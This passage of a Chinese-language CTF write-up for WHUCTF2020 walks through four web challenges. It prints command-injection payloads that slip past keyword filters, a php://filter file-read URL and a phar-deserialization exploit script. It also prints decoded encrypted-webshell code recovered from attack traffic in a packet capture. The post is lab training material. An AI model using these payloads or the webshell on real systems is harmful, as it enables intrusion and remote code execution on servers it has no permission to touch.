class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/.*f.*l.*a.*g.*/&quot;</span>, <span class="hljs-variable">$ip</span>))&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;no flag&quot;</span>);<br>  &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/tac|rm|echo|cat|nl|less|more|tail|head/&quot;</span>, <span class="hljs-variable">$ip</span>))&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;cat&#x27;t read flag&quot;</span>);<br>  &#125;<br>  <span class="hljs-variable">$a</span> = <span class="hljs-title function_ invoke__">shell_exec</span>(<span class="hljs-string">&quot;ping -c 4 &quot;</span>.<span class="hljs-variable">$ip</span>); <br>  <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;pre&gt;&quot;</span>;<br>  <span class="hljs-title function_ invoke__">print_r</span>(<span class="hljs-variable">$a</span>);<br>&#125;<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>过滤了 <code>&#123;</code>，<code>&#125;</code> ，没有过滤 <code>$</code>，空格可以使用 <code>$IFS$9</code> 绕过，管道符被过滤了，但是可以用 <code>;</code> 进行另一条命令的执行，首先 <code>?ip=;ls</code> 就可以看到 flag 就在 <code>flag.php</code></p>
<p><img src="https://img.tucang.cc/api/image/show/05f7980b6ab6816045465c1067477498" srcset="/img/loading.gif" lazyload alt="image-20200527210656915"></p>
<p>然后过滤了读的命令关键字，这里用 <code>ca\t</code> 即可绕过，同时也过滤了 <code>flag.php</code> 的关键字，我们可以用拼接的方法来绕过:</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">?ip=;a=fl;b=ag;ca\t<span class="hljs-variable">$IFS</span><span class="hljs-variable">$9</span><span class="hljs-variable">$a</span><span class="hljs-variable">$b</span>.php <span class="hljs-regexp">//</span>但还是会被检测出来，因此我们可以换一下顺序或者换成部分<br>?ip=;a=ag;b=fl;ca\t<span class="hljs-variable">$IFS</span><span class="hljs-variable">$1</span><span class="hljs-variable">$b</span><span class="hljs-variable">$a</span>.php<br>?ip=;a=lag;ca\t<span class="hljs-variable">$IFS</span><span class="hljs-variable">$9f</span><span class="hljs-variable">$a</span>.php<br></code></pre></td></tr></table></figure>

<p>完整 payload：<code>?ip=;a=lag;ca\t$IFS$9f$a.php</code></p>
<h1 id="ezinclude"><a href="#ezinclude" class="headerlink" title="ezinclude"></a>ezinclude</h1><p>这道题有点脑洞，在 <code>/contact.php</code> 里有提交表单的选项，随便提交发现 url 上有一些参数，题目说是文件包含，那么往这方面去想，后来发现直接加一个 <code>file</code> 参数就可以读了，flag就出来了，可能是给新生的送分题吧。</p>
<p>完整 payload: <code>/thankyou.php?firstname=&amp;lastname=&amp;country=australia&amp;subject=&amp;file=php://filter/convert.base64-encode/resource=flag.php</code></p>
<h1 id="Easy-unserialize"><a href="#Easy-unserialize" class="headerlink" title="Easy_unserialize"></a>Easy_unserialize</h1><p>这题考察的是上传 phar 触发反序列化，刚好补了一下我的坑。。可以参考创宇的 paper: <code>https://paper.seebug.org/680/</code></p>
<p>还是学弟发现在主页加参数 <code>?acti0n=php://filter/convert.Base64-encode/resource=upload.php</code> 可以读到源码，于是把 <code>view.php</code> 和 <code>upload.php</code> 的源码看了一下， <code>upload</code> 的源码好像没有什么利用的点，看到 <code>view.php</code> 的时候，发现了一个 <code>phar</code> 的危险函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">delete_img</span>(<span class="hljs-params"><span class="hljs-variable">$file_name</span></span>) </span>&#123;<br> 	<span class="hljs-variable">$name</span> = <span class="hljs-variable">$file_name</span>;<br> 	<span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-variable">$name</span>)) &#123;<br> 		@<span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-variable">$name</span>);<br> 		<span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-variable">$name</span>)) &#123;<br> 			<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;p align=\&quot;center\&quot; style=\&quot;font-weight: bold;\&quot;&gt;成功删除! 3s后跳转&lt;/p&gt;&quot;</span>;<br> 			<span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">&quot;refresh:3;url=view.php&quot;</span>);<br> 		&#125; <span class="hljs-keyword">else</span> &#123;<br> 			<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Can not delete!&quot;</span>;<br> 			<span class="hljs-keyword">exit</span>;<br> 		&#125;<br> 	&#125; <span class="hljs-keyword">else</span> &#123;<br> 		<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;p align=\&quot;center\&quot; style=\&quot;font-weight: bold;\&quot;&gt;找不到这个文件! &lt;/p&gt;&quot;</span>;<br> 	&#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这里有一个 <code>file_exists</code> 可以利用，而且最后还会进行代码执行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br> 	<span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>-&gt;cmd);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>虽然 <code>upload.php</code> 没有什么利用点，但是可以看到黑名单</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/(scandir)|(end)|(implode)|(eval)|(system)|(passthru)|(exec)|(chroot)|(chgrp)|(chown)|(shell_exec)|(proc_open)|(proc_get_status)|(ini_alter)|(ini_set)|(ini_restore)|(dl)|(pfsockopen)|(symlink)|(popen)|(putenv)|(syslog)|(readlink)|(stream_socket_server)|(error_log)/i&#x27;</span>, <span class="hljs-variable">$content</span>)<br></code></pre></td></tr></table></figure>

<p>我们可以用 <code>show_source()</code> 函数把 <code>flag.php</code> 读一下，而且 <code>phar</code> 可以直接上传，那我们先构造：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">View</span></span><br><span class="hljs-class">    </span>&#123;<br>        <span class="hljs-keyword">public</span> <span class="hljs-variable">$dir</span>;<br>        <span class="hljs-keyword">private</span> <span class="hljs-variable">$cmd</span>;<br><br>        <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">        </span>&#123;<br>            <span class="hljs-variable language_">$this</span>-&gt;cmd = <span class="hljs-string">&#x27;show_source(&quot;flag.php&quot;);&#x27;</span>;<br>        &#125;<br>        <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>            <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>-&gt;cmd);<br>        &#125;<br>    &#125;<br>    <span class="hljs-variable">$phar</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Phar</span>(<span class="hljs-string">&#x27;phar.phar&#x27;</span>);<br>    <span class="hljs-variable">$phar</span> -&gt; <span class="hljs-title function_ invoke__">startBuffering</span>();<br>    <span class="hljs-variable">$phar</span> -&gt; <span class="hljs-title function_ invoke__">setStub</span>(<span class="hljs-string">&#x27;GIF89a&#x27;</span>.<span class="hljs-string">&#x27;&lt;?php __HALT_COMPILER();?&gt;&#x27;</span>);   <span class="hljs-comment">//设置stub，增加gif文件头</span><br>    <span class="hljs-variable">$phar</span> -&gt;<span class="hljs-title function_ invoke__">addFromString</span>(<span class="hljs-string">&#x27;test.txt&#x27;</span>,<span class="hljs-string">&#x27;test&#x27;</span>);  <span class="hljs-comment">//添加要压缩的文件</span><br>    <span class="hljs-variable">$object</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">View</span>();<br>    <span class="hljs-variable">$phar</span> -&gt; <span class="hljs-title function_ invoke__">setMetadata</span>(<span class="hljs-variable">$object</span>);  <span class="hljs-comment">//将自定义meta-data存入manifest</span><br>    <span class="hljs-variable">$phar</span> -&gt; <span class="hljs-title function_ invoke__">stopBuffering</span>();<br>    <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>exp 的模板，有时候限制 gif 的话可以增加 <code>gif</code> 头，生成 <code>phar</code> 文件后，直接上传。</p>
<p><img src="https://img.tucang.cc/api/image/show/4a5affb4024b2251fd9864cca871e39a" srcset="/img/loading.gif" lazyload alt="image-20200527212700287"></p>
<p>我们可以知道，要通过 <code>delete</code> 这个参数来触发 <code>file_exists</code> 才可以利用 <code>phar</code>，因此构造参数 <code>detele=phar://phar.phar</code>包含一下，就可以得到flag了。</p>
<p><code>WHUCTF&#123;Phar_1s_Very_d@nger0u5&#125;</code></p>
<h1 id="shellofAWD"><a href="#shellofAWD" class="headerlink" title="shellofAWD"></a>shellofAWD</h1><p>这题是一个流量包，听名字应该是在打 AD 时的流量包，打开流量包很快就可以发现🐎，并且还可以看到靶机的 ip，筛选一下进行分析。</p>
<p><img src="https://img.tucang.cc/api/image/show/89625b98c3cbfa060fa3a34924ea999f" srcset="/img/loading.gif" lazyload alt="image-20200527213132020"></p>
<p>后来跟踪下一个 tcp 流，发现送了一堆参数</p>
<p><img src="https://img.tucang.cc/api/image/show/8b08a2fa415c0b1354f6aa29254e8bcd" srcset="/img/loading.gif" lazyload alt="image-20200527213230184"></p>
<p>base64解码ant参数得到</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss"><span class="hljs-built_in">eval</span>(base64_decode($_POST[_0x6aa401ad3c537]));<span class="hljs-built_in">die</span>();<br></code></pre></td></tr></table></figure>

<p>再看看 <code>_0x6aa401ad3c537</code> 的参数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>@<span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&quot;display_errors&quot;</span>, <span class="hljs-string">&quot;0&quot;</span>);<br>@<span class="hljs-title function_ invoke__">set_time_limit</span>(<span class="hljs-number">0</span>);<br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">asenc</span>(<span class="hljs-params"><span class="hljs-variable">$out</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$out</span>;<br>&#125;<br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">asoutput</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$output</span> = <span class="hljs-title function_ invoke__">ob_get_contents</span>();<br>    <span class="hljs-title function_ invoke__">ob_end_clean</span>();<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;2e0ebea5592&quot;</span>;<br>    <span class="hljs-keyword">echo</span> @<span class="hljs-title function_ invoke__">asenc</span>(<span class="hljs-variable">$output</span>);<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;62e800a0&quot;</span>;<br>&#125;<br><span class="hljs-title function_ invoke__">ob_start</span>();<br><span class="hljs-keyword">try</span> &#123;<br>    <span class="hljs-variable">$D</span> = <span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&quot;SCRIPT_FILENAME&quot;</span>]);<br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$D</span> == <span class="hljs-string">&quot;&quot;</span>) &#123;<br>        <span class="hljs-variable">$D</span> = <span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&quot;PATH_TRANSLATED&quot;</span>]);<br>    &#125;<br>    <span class="hljs-variable">$R</span> = <span class="hljs-string">&quot;<span class="hljs-subst">&#123;$D&#125;</span>\t&quot;</span>;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$D</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>) != <span class="hljs-string">&quot;/&quot;</span>) &#123;<br>        <span class="hljs-keyword">foreach</span> (<span class="hljs-title function_ invoke__">range</span>(<span class="hljs-string">&quot;C&quot;</span>, <span class="hljs-string">&quot;Z&quot;</span>) <span class="hljs-keyword">as</span> <span class="hljs-variable">$L</span>) &#123;<br>            <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">is_dir</span>(<span class="hljs-string">&quot;<span class="hljs-subst">&#123;$L&#125;</span>:&quot;</span>)) &#123;<br>                <span class="hljs-variable">$R</span> .= <span class="hljs-string">&quot;<span class="hljs-subst">&#123;$L&#125;</span>:&quot;</span>;<br>            &#125;<br>        &#125;<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-variable">$R</span> .= <span class="hljs-string">&quot;/&quot;</span>;<br>    &#125;<br>    <span class="hljs-variable">$R</span> .= <span class="hljs-string">&quot;\t&quot;</span>;<br>    <span class="hljs-variable">$u</span> = <span class="hljs-title function_ invoke__">function_exists</span>(<span class="hljs-string">&quot;posix_getegid&quot;</span>) ? @<span class="hljs-title function_ invoke__">posix_getpwuid</span>(@<span class="hljs-title function_ invoke__">posix_geteuid</span>()) : <span class="hljs-string">&quot;&quot;</span>;<br>    <span class="hljs-variable">$s</span> = <span class="hljs-variable">$u</span> ? <span class="hljs-variable">$u</span>[<span class="hljs-string">&quot;name&quot;</span>] : @<span class="hljs-title function_ invoke__">get_current_user</span>();<br>    <span class="hljs-variable">$R</span> .= <span class="hljs-title function_ invoke__">php_uname</span>();<br>    <span class="hljs-variable">$R</span> .= <span class="hljs-string">&quot;\t<span class="hljs-subst">&#123;$s&#125;</span>&quot;</span>;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-variable">$R</span>;<br>&#125; <span class="hljs-keyword">catch</span> (<span class="hljs-built_in">Exception</span> <span class="hljs-variable">$e</span>) &#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;ERROR://&quot;</span> . <span class="hljs-variable">$e</span>-&gt;<span class="hljs-title function_ invoke__">getMessage</span>();<br>&#125;<br><span class="hljs-title function_ invoke__">asoutput</span>();<br><span class="hljs-keyword">die</span>;<br></code></pre></td></tr></table></figure>

<p>当然，可以看到其实并没有什么用，可能就测试一下功能，不过大概知道了他传东西的套路了，看到 <code>tcp.stream eq 3</code> 时，发现了</p>
<p><img src="https://img.tucang.cc/api/image/show/ba566ba0b1f09819682dbc13787fb2dd" srcset="/img/loading.gif" lazyload alt="image-20200527213650249"></p>
<p>拿到了比较关键的代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>@<span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&quot;display_errors&quot;</span>, <span class="hljs-string">&quot;0&quot;</span>);<br>@<span class="hljs-title function_ invoke__">set_time_limit</span>(<span class="hljs-number">0</span>);<br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">asenc</span>(<span class="hljs-params"><span class="hljs-variable">$out</span></span>) </span>&#123;<br>	<span class="hljs-keyword">return</span> <span class="hljs-variable">$out</span>;<br>&#125;<br>;<br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">asoutput</span>(<span class="hljs-params"></span>) </span>&#123;<br>	<span class="hljs-variable">$output</span>=<span class="hljs-title function_ invoke__">ob_get_contents</span>();<br>	<span class="hljs-title function_ invoke__">ob_end_clean</span>();<br>	<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;17dc23&quot;</span>;<br>	<span class="hljs-keyword">echo</span> @<span class="hljs-title function_ invoke__">asenc</span>(<span class="hljs-variable">$output</span>);<br>	<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;f890355d3c&quot;</span>;<br>&#125;<br><span class="hljs-title function_ invoke__">ob_start</span>();<br><span class="hljs-keyword">try</span> &#123;<br>	<span class="hljs-variable">$f</span>=<span class="hljs-title function_ invoke__">base64_decode</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;j6b36f516d1adf&quot;</span>]);<br>	<span class="hljs-variable">$c</span>=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;oc86831f79ec72&quot;</span>];<br>	<span class="hljs-variable">$c</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-variable">$c</span>);<br>	<span class="hljs-variable">$c</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-variable">$c</span>);<br>	<span class="hljs-variable">$buf</span>=<span class="hljs-string">&quot;&quot;</span>;<br>	<span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span>=<span class="hljs-number">0</span>;<span class="hljs-variable">$i</span>&lt;<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$c</span>);<span class="hljs-variable">$i</span>+=<span class="hljs-number">2</span>)<span class="hljs-variable">$buf</span>.=<span class="hljs-title function_ invoke__">urldecode</span>(<span class="hljs-string">&quot;%&quot;</span>.<span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$c</span>,<span class="hljs-variable">$i</span>,<span class="hljs-number">2</span>));<br>	<span class="hljs-keyword">echo</span>(@<span class="hljs-title function_ invoke__">fwrite</span>(<span class="hljs-title function_ invoke__">fopen</span>(<span class="hljs-variable">$f</span>,<span class="hljs-string">&quot;a&quot;</span>),<span class="hljs-variable">$buf</span>)?<span class="hljs-string">&quot;1&quot;</span>:<span class="hljs-string">&quot;0&quot;</span>);<br>	;<br>&#125;<br><span class="hljs-keyword">catch</span>(<span class="hljs-built_in">Exception</span> <span class="hljs-variable">$e</span>) &#123;<br>	<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;ERROR://&quot;</span>.<span class="hljs-variable">$e</span>-&gt;<span class="hljs-title function_ invoke__">getMessage</span>();<br>&#125;<br>;<br><span class="hljs-title function_ invoke__">asoutput</span>();<br><span class="hljs-keyword">die</span>();<br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>其中有一段解码的引起了注意，将参数里 <code>$c=$_POST[&quot;oc86831f79ec72&quot;];</code> 进行解码，可以得到：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>@<span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;pass&#x27;</span>]))<br>&#123;<br>    <span class="hljs-variable">$key</span>=<span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-title function_ invoke__">uniqid</span>(<span class="hljs-title function_ invoke__">rand</span>())),<span class="hljs-number">16</span>);<br>    <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;k&#x27;</span>]=<span class="hljs-variable">$key</span>;<br>    <span class="hljs-keyword">print</span> <span class="hljs-variable">$key</span>;<br>&#125;<br><span class="hljs-keyword">else</span><br>&#123;<br>    <span class="hljs-variable">$key</span>=<span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;k&#x27;</span>];<br>	<span class="hljs-variable">$post</span>=<span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&quot;php://input&quot;</span>);<br>	<span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">extension_loaded</span>(<span class="hljs-string">&#x27;openssl&#x27;</span>))<br>	&#123;<br>		<span class="hljs-variable">$t</span>=<span class="hljs-string">&quot;base64_&quot;</span>.<span class="hljs-string">&quot;decode&quot;</span>;<br>		<span class="hljs-variable">$post</span>=<span class="hljs-variable">$t</span>(<span class="hljs-variable">$post</span>.<span class="hljs-string">&quot;&quot;</span>);<br>		<br>		<span class="hljs-keyword">for</span>(<span class="hljs-variable">$i</span>=<span class="hljs-number">0</span>;<span class="hljs-variable">$i</span>&lt;<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$post</span>);<span class="hljs-variable">$i</span>++) &#123;<br>    		<span class="hljs-variable">$post</span>[<span class="hljs-variable">$i</span>] = <span class="hljs-variable">$post</span>[<span class="hljs-variable">$i</span>]^<span class="hljs-variable">$key</span>[<span class="hljs-variable">$i</span>+<span class="hljs-number">1</span>&amp;<span class="hljs-number">15</span>]; <br>    	&#125;<br>	&#125;<br>	<span class="hljs-keyword">else</span><br>	&#123;<br>		<span class="hljs-variable">$post</span>=<span class="hljs-title function_ invoke__">openssl_decrypt</span>(<span class="hljs-variable">$post</span>, <span class="hljs-string">&quot;AES128&quot;</span>, <span class="hljs-variable">$key</span>);<br>	&#125;<br>    <span class="hljs-variable">$arr</span>=<span class="hljs-title function_ invoke__">explode</span>(<span class="hljs-string">&#x27;|&#x27;</span>,<span class="hljs-variable">$post</span>);<br>    <span class="hljs-variable">$func</span>=<span class="hljs-variable">$arr</span>[<span class="hljs-number">0</span>];<br>    <span class="hljs-variable">$params</span>=<span class="hljs-variable">$arr</span>[<span class="hljs-number">1</span>];<br>	<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">C</span></span>&#123;<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$p</span></span>) </span>&#123;<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$p</span>.<span class="hljs-string">&quot;&quot;</span>);&#125;&#125;<br>	@<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">C</span>(<span class="hljs-variable">$params</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这里就是比较关键的代码了，首先传 <code>pass</code> 设置 <code>SESSION</code>，这是 <code>AES</code> 的密钥，我们查到流量包有两个传 <code>pass</code> 的，最后一个得到的 key 就是后面我们用来解密的 <code>AES</code> 密钥。<img src="https://img.tucang.cc/api/image/show/c05e934d07d4e9035852492fd7fd2528" srcset="/img/loading.gif" lazyload alt="image-20200527214324885"></p>
<p>可以知道 <code>key</code> &#x3D; <code>91ee1bfc4fd27c90</code>，接下来就是硬解后面的流量包了。发现执行了 <code>ln -s /flag jquery.min.js</code> ，这样 <code>jquery.min.js</code> 就指向了 flag，读它就得到了flag<code>(tcp.stream eq 6)</code></p>
<p><img src="https://img.tucang.cc/api/image/show/68ef8008264fa16a6c82f7bb79c7dfa9" srcset="/img/loading.gif" lazyload alt="image-20200527215003442"></p>
<p>最后在 <code>tcp.stream eq 7</code> 里的回应里解密可以得到结果的 base64，结果解码就是flag了。</p>
<p>exp:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>	<span class="hljs-variable">$post</span>=<span class="hljs-string">&quot;5U+SIO3pbt0CXFm7gLAx3xT7q0qDPFaCK8lNevS6Nrmak6Hhj9PXx3ZlGnMIgkqnqHmf6ba5VvtRMgJP6wUtoMXx5WeYJvobewjKDmZ8sSUCZJhKzzkX2ISKKy/snPv+6UOh5rBo6j/JvFGUOUjkKCbCe+nEGD9EKyv10Uu9KHU=&quot;</span>;<br><span class="hljs-variable">$key</span>=<span class="hljs-string">&quot;91ee1bfc4fd27c90&quot;</span>;<br><span class="hljs-variable">$post</span>=<span class="hljs-title function_ invoke__">openssl_decrypt</span>(<span class="hljs-variable">$post</span>, <span class="hljs-string">&quot;AES128&quot;</span>, <span class="hljs-variable">$key</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$post</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://img.tucang.cc/api/image/show/71c6d2fc7a2d3f1619716a99aed09458" srcset="/img/loading.gif" lazyload alt="image-20200527215208860"></p>
<p><img src="https://img.tucang.cc/api/image/show/93c1bb0c9d0d0413d810b70f1e51d4dd" srcset="/img/loading.gif" lazyload alt="image-20200527215228699"></p>
<p>总体来说还是挺好玩的，总结了一些思路可以回去训练新人，武大的师傅还是很强，剩下两题web也没咋看，js还是硬伤不怎么会，留个坑以后慢慢补。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/CTF/" class="print-no-link">#CTF</a>
      
        <a href="/tags/WriteUps/" class="print-no-link">#WriteUps</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>WHUCTF2020 Writeup</div>
      <div>https://52hertz.tech/2020/05/26/whuctf2020_writeup/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Ustin1an</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2020年5月26日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
